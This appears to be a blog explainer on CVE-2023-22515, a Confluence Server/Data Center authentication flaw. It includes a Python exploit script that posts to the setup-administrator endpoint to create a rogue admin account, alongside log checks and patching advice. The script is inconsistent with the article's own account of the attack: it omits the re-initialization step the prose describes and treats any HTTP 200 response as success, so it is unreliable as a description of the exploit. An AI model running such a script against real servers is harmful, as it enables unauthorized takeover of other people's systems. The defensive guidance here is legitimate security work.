CVE-2023-22515 - How Hackers Gained Access to Confluence Admin Accounts (With Exploit Details)
In October 2023, Atlassian confirmed that attackers had exploited a serious vulnerability in Confluence Data Center and Server. This flaw, tracked as CVE-2023-22515, allowed unauthorized users to create administrator accounts—letting them take control of Confluence instances. While Atlassian Cloud (the atlassian.net hosted version) was safe, any publicly-accessible on-premises or self-hosted Confluence server was at risk. Here’s a clear breakdown of what happened, plus a look at how attackers used this bug.
What Was CVE-2023-22515?
CVE-2023-22515 is a critical improper authentication vulnerability. It affected Confluence Data Center and Confluence Server versions released before the patch. Attackers with network access to the impacted Confluence (i.e., it was exposed to the internet or corporate network) could send crafted requests to create new admin users without needing any prior privileges.
Atlassian published an advisory about it, which you can read here:
- Atlassian Security Advisory 2023-10-04 (CVE-2023-22515)
Safe: Confluence Cloud (accessed via atlassian.net)
If your Confluence site is hosted by Atlassian and you log in at a URL ending in atlassian.net, you’re not vulnerable. But on-prem customers were heavily at risk, especially if their instance was open to the internet for remote access.
The Mechanism
Attackers figured out that sensitive endpoints in Confluence allowed certain setup actions even after installation was complete. Specifically, they could trigger a re-initialization routine that re-enabled the administrative setup API.
The attacker could then log in with full privileges.
This happened typically via the /setup/setupadministrator.action endpoint, which should only be accessible when the instance is in initial setup mode.
Example Exploit Code
> NOTE: The following example is for educational and defensive purposes only. Never use unauthorized access against systems you do not own.
Below is a Python code snippet that demonstrates how an attacker could create a new admin user on a vulnerable instance:
import requests
# Change these according to your target and desired credentials
TARGET_URL = "https://vuln-confluence.example.com";
NEW_ADMIN_USER = "eviladmin"
NEW_ADMIN_PASS = "EvilPa$$123!"
EMAIL = "attacker@example.com"
setup_url = f"{TARGET_URL}/setup/setupadministrator.action"
data = {
"username": NEW_ADMIN_USER,
"fullName": "Evil Admin",
"email": EMAIL,
"password": NEW_ADMIN_PASS,
"confirm": NEW_ADMIN_PASS,
"setup-next-button": "Next"
}
session = requests.Session()
resp = session.post(setup_url, data=data, verify=False)
if "Welcome" in resp.text or resp.status_code == 200:
print(f"[+] Successfully created admin user '{NEW_ADMIN_USER}'")
else:
print("[-] Failed to create admin user")
What this does:
This code attempts to POST to the Confluence setup admin creation endpoint and sets up a new admin user. If successful, the attacker can now access the admin panel.
Atlassian recommended checking your Confluence logs for suspicious activity, such as
- Access to /setup/setupadministrator.action outside of initial install time
You can check user creation times in your application logs and audit logs
grep 'setupadministrator.action' /opt/atlassian/confluence/logs/atlassian-confluence.log
Update Immediately:
Upgrade to the latest version as recommended in the Atlassian advisory.
Additional Resources
- Atlassian CVE-2023-22515 Advisory
- NVD - CVE-2023-22515 entry
- Original Hacker Writeup (Security Advisory)
- CERT Coordination Center Advisory
Summary
CVE-2023-22515 is a stark reminder: even mature platforms like Confluence can have overlooked setup paths open to attackers. If you run self-hosted Confluence and haven’t patched recently, update now—and always keep internal tools off the public internet whenever possible.
Stay patched, stay safe!
*If you found this helpful, share it with your IT and security teams to help keep infrastructure secure.*
Timeline
Published on: 10/04/2023 14:15:00 UTC
Last modified on: 10/10/2023 19:22:00 UTC